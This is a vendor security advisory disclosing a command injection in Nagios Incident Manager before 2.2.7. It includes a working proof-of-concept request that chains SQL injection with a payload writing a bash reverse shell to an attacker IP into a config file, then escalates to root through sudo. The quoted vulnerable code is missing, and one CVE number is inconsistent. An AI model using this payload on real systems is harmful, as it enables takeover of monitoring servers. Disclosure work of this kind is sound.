A Command Injection vulnerability in Nagios Incident Manager (component of Nagios XI) before 2.2.7 allows authenticated attackers to achieve remote code execution via a malicious host
record.
“Resolve network incidents, collaborate with team members, and track incident history”. For more information visit https://www.nagios.com/products/nagios-incident-manager/.
The Nagios XI API /nagiosxi/includes/components/nagiosim/nagiosim.php
allows interaction with Nagios IM through the file nagiosxi/basedir/html/includes/components/nagiosim/nagiosim.php
:
|
|
At [1], the host
variable is read from the database query shown in CVE-2020-9204. At [2], it is used into a command string without sanitization nor validation. At [3] the assembled command is run.
An authenticated attacker can achieve Remote Code Execution through a malicious host
record in a network incident.
Note: this PoC exploits CVE-2019-9204, CVE-2019-9166 and CVE-2019-9203 too to achieve root remote code execution.
[host]/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=update&token=&incident_id=1'UNION%20select%201,2,3,4,"';echo%20'print(\"bash+-i+>%26+/dev/tcp/10.13.37.42/8080+0>%261+%23\")%3b'>>+/usr/local/nagiosxi/html/config.inc.php%3b+sudo+/usr/local/nagiosxi/scripts/repair_databases.sh%3b%23",6,7,8,'x
using the logged-in sessionAn authenticated attacker can take control of Nagios XI.
Upgrade to Nagios IM 2.2.7 or later. (Note: we didn’t verify the patch.)
This report was subject to Shielder’s disclosure policy:
`polict` of Shielder
This advisory was first published on https://www.shielder.com/advisories/nagiosim-host-remote-code-execution/
Date
10 April 2019